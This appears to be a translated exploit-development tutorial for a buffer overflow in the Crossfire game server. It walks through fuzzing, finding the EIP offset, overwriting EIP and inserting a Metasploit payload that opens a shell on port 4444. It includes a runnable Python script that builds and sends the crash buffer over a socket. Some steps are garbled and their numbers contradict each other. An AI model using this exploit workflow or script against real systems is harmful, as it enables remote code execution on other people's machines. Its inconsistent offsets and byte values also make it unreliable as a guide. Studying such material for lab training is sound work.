Run the Crossfire software from the console:
root@bt:~/crossfire/bin# ./crossfire
then run the fuzzer from a second console: root@bt:~# python xxx.py
and observe what happens to the software running in the first console.
The Crossfire software we attack with the fuzzer evidently crashes, so the next step is to change the fuzzer again in order to see what the Crossfire program's EIP becomes.
After the fuzzer has been changed to send 4379 bytes of data, run the Crossfire software again from the console and observe what happens.
What changes in the fuzzer is the buffer it sends: 4379 characters, followed by a marker value, written as follows.
crash = "\x41" * 4379  -- 4 becomes [4395]
crash += "\xef\xbe\xad\xde"
(the second line is 0xdeadbeef written in little-endian byte order, so it is easy to recognise if it lands in EIP)
Run the fuzzer, then start the application again as before.
Add crash += "\x41" * 3 to the fuzzer and repeat, running the program again until its EIP changes.
What this does is overwrite the program's state by having the fuzzer send 4397 bytes to the application.
Checking how much data it takes to reach EIP, in the console (the argument to pattern_offset.rb is the EIP value observed at the crash when the fuzzer sends a pattern_create.rb pattern instead of the "\x41" bytes):
root@bt:/opt/framework/msf3/tools# ./pattern_offset.rb 46367046
It turns out the pattern offset is 4368, which means the 4379 bytes of data we created in the first fuzzer were too many. The buffer must be reduced first, then checked again from the console.
To confirm it, test with the command: crash += "\x90\x90\x90\x90"
Then we can confirm that the EIP value we found changes, i.e. we have a full overwrite of EIP.
Do a test by typing commands in the console:
root@bt:~/crossfire/bin# gdb crossfire
Inside the process: type run, then info registers.
As seen in the image above, EIP was changed to 0x90909090.
Then go back into the fuzzer (EAX is 0xb7da3a0e) and change the fuzzer to something like the following:
crash += "\x0E\x3A\xDA\xB7"
and insert the EIP (eip 0xb7da3a1f 0xb7da3a1f)
and insert the EIP that has changed: crash += "\x1E\x3A\xda\xB7"
(note: the byte \x1E here does not match the value 0xb7da3a1f shown above; 0xb7da3a1f in little-endian order would be "\x1f\x3a\xda\xb7")
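As an added example (not the page's own fuzzer, whose source is not shown), a Python 3 script that reproduces the offset-finding and buffer-building steps above: it generates the same cyclic pattern as pattern_create.rb, finds the offset of the EIP value 46367046 that the page feeds to pattern_offset.rb, and assembles the crash buffer in the page's layout (filler, EIP, four NOPs). The host 127.0.0.1, port 13327, the empty protocol prefix and the trailing newline in send_crash are assumptions for this example, not taken from the page.

```python
import socket
import string
import struct
import sys

# Added example, not the page's fuzzer (its script xxx.py is not shown).
# Steps reproduced from the page:
#   1. generate the cyclic pattern that pattern_create.rb would produce,
#   2. locate the offset of the crash EIP (46367046) as pattern_offset.rb does,
#   3. build the crash buffer in the page's layout: filler, EIP, four NOPs.

MAX_PATTERN = 26 * 26 * 10 * 3  # the pattern repeats after 20280 bytes


def pattern_create(length):
    """Metasploit-style pattern Aa0Aa1...Aa9Ab0...: every 4-byte window is unique."""
    if length > MAX_PATTERN:
        raise ValueError("length exceeds the unique pattern size")
    buf = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                buf += (upper + lower + digit).encode()
                if len(buf) >= length:
                    return bytes(buf[:length])
    return bytes(buf)


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that landed in EIP.

    gdb prints EIP as a 32-bit number; x86 is little-endian, so the bytes in
    memory are the reverse of the printed value (0x46367046 -> b"Fp6F").
    """
    needle = struct.pack("<I", eip_value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("EIP value %#x not found in pattern" % eip_value)
    return offset


def build_crash(offset, eip_value, trailer=b"\x90" * 4, filler=b"\x41"):
    """Filler up to the EIP slot, the new EIP (little-endian), then the trailer.

    With eip_value=0xdeadbeef the EIP slot holds b"\\xef\\xbe\\xad\\xde", the
    value the page writes by hand; with the default trailer the bytes after
    it are the four NOPs the page adds as its second check.
    """
    return filler * offset + struct.pack("<I", eip_value) + trailer


def send_crash(data, host="127.0.0.1", port=13327, prefix=b""):
    """Send the buffer to the server.

    Host, port 13327, the empty prefix and the trailing newline are
    assumptions for this example; the page does not show what its fuzzer
    sends around the buffer.
    """
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(prefix + data + b"\n")


if __name__ == "__main__":
    pattern = pattern_create(4379)          # same length as the page's first fuzzer
    off = pattern_offset(pattern, 0x46367046)
    print("EIP offset:", off)               # 4368, as pattern_offset.rb reports
    crash = build_crash(off, 0xDEADBEEF)
    print("crash buffer length:", len(crash))
    if len(sys.argv) > 1:                   # only sends when a host is given
        send_crash(crash, host=sys.argv[1])
```

Run it without arguments to see the offset and buffer size; pass a host to actually send the buffer, then check the result the way the page does, with gdb (run, then info registers) and compare EIP against the value written into the buffer.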
"Payload"
Next, on the console, run ./msfweb.
Once that is done we find and generate a new payload to be placed into the fuzzer later. First look at our console and type the command: root@bt:/pentest/exploits/framework2# ./msfweb
From there a URL address will appear that provides the payload.
Copy the whole payload obtained in the browser into the fuzzer, place it into the payload part of the buffer, and test the fuzzer using telnet 127.0.0.1 4444.
...Finish...
Alhamdulillahi rabbil alamin.